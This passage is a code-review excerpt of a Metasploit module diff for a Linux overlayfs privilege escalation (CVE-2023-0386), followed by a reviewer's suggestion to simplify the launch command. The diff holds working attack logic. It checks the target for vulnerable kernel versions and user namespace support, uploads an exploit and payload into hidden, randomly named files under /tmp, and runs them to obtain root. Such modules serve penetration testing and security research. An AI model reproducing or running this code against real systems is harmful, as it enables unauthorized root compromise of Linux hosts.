modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb

```diff
@@ -0,0 +1,146 @@
+        ],
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+        }
+      )
+    )
+    register_options([
+      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]),
+      OptInt.new('TIMEOUT', [ true, 'Timeout for exploit (seconds)', '60' ])
+    ])
+    register_advanced_options([
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ])
+  end
+
+  def check
+    unless kernel_arch.include?('x64')
+      return CheckCode::Safe("System architecture #{kernel_arch} is not supported")
+    end
+
+    kernel_version = Rex::Version.new(kernel_release.split('-').first)
+    if kernel_version < Rex::Version.new('5.11') ||
+       kernel_version.between?(Rex::Version.new('5.15.91'), Rex::Version.new('5.16')) ||
+       Rex::Version.new('6.1.9') <= kernel_version
+      return CheckCode::Safe("Linux kernel version #{kernel_version} is not vulnerable")
+    end
+
+    unless userns_enabled?
+      return CheckCode::Safe('Unprivileged user namespaces are not permitted')
+    end
+
+    vprint_good('Unprivileged user namespaces are permitted')
+
+    CheckCode::Appears("Linux kernel version found: #{kernel_version}")
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def exploit
+    if !datastore['ForceExploit'] && is_root?
+      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
+    end
+
+    unless writable?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
+    end
+
+    # Upload exploit executable
+    exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    exploit_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
+    shell_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
+
+    mkdir(exploit_dir)
+    register_dir_for_cleanup(exploit_dir)
+
+    if live_compile?
+      vprint_status('Live compiling exploit on system...')
+      upload_and_compile(exploit_path, exploit_source('CVE-2023-0386', 'cve_2023_0386.c'), '-D_FILE_OFFSET_BITS=64 -lfuse -ldl -pthread')
+      upload_and_compile(shell_path, exploit_source('CVE-2023-0386', 'shell.c'))
+    else
+      vprint_status('Dropping pre-compiled exploit on system...')
+      upload_and_chmodx(exploit_path, exploit_data('CVE-2023-0386', 'cve_2023_0386.x64.elf'))
+      upload_and_chmodx(shell_path, exploit_data('CVE-2023-0386', 'shell.x64.elf'))
+    end
+
+    # Upload payload executable
+    payload_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
+    upload_and_chmodx(payload_path, generate_payload_exe)
+
+    # Launch exploit
+    print_status('Launching exploit...')
+    cmd_string = "echo '#{payload_path} & exit' | #{exploit_path} #{shell_path} #{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
```

Comment:
```suggestion
    cmd_string = "#{exploit_path} #{shell_path} #{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
```
If you call `setgid` and `setuid` in the exploit before executing the payload.